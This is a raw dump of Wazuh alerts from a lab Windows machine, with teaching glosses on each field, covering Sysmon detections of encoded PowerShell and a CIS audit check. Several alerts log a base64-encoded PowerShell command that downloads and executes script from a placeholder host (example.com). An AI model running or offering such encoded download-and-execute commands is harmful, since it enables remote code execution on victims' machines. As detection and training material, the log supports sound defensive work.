rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 92 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534369.1842322 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:26.6347400Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285300 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:26.599
ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ProcessId: 12304
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kkk1op4e.muk.ps1
CreationUtcTime: 2025-04-24 22:39:26.599
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:26.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kkk1op4e.muk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:26.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 89 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534372.1845091 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:30.0574559Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285327 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:28.089
ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ProcessId: 15520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ParentProcessId: 12304
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:28.089 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 93 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534372.1853162 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:30.2971724Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285328 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:30.274
ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ProcessId: 15520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ulxacboz.arb.ps1
CreationUtcTime: 2025-04-24 22:39:30.274
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:30.274 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ulxacboz.arb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:30.274 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1855931 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26160 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Removable Storage' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Removable Storage"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Removable Storage"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 90 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534375.1859856 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:33.0039060Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285351 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:31.869
ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00}
ProcessId: 6888
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00}
ParentProcessId: 15520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:31.869 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bda3-680a-a80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
